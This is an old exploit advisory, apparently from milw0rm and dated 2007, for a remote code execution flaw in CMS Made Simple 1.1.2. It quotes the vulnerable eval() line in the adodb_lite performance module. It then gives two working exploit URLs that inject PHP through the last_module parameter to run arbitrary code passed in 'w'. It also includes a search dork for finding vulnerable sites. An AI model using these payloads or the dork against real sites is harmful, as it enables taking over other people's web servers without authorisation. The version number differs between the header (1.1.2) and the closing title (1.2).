1 # o [bug] /"*._ _ #
2 # . . . .−*’‘ ‘*−.._.−’/ #
3 # o o < * )) , ( #
4 # . o ‘*−._‘._(__.−−*"‘.\ #
5 # #
6 # vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability #
7 # author: irk4z@yahoo.pl #
8 # download: #
9 # http://dev.cmsmadesimple.org/frs/download.php/1424/cmsmadesimple−1.1.2.zip #
10 # dork: "powered by CMS Made Simple version 1.1.2" #
11 # greetz: cOndemned, kacper, str0ke #
12
13 # code:
14
15 /lib/adodb_lite/adodb−perf−module.inc.php:
16 ...
17 eval(’class perfmon_parent_EXTENDER extends ’ . $last_module . ’_ADOConnection { }’);
18 ...
19
20 # exploit:
21
22 http://[site]/[path]/lib/adodb_lite/adodb−perf−module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20
zZz_ADOConnection{}//&w=phpinfo();
23 http://[site]/[path]/lib/adodb_lite/adodb−perf−module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20
zZz_ADOConnection{}//&w=[ PHPCODE ]
24
25 # milw0rm.com [2007−09−21]
Page 1/1
CMS Made Simple 1.2 Remote Code Execution Vulnerability
irk4z
09/21/2007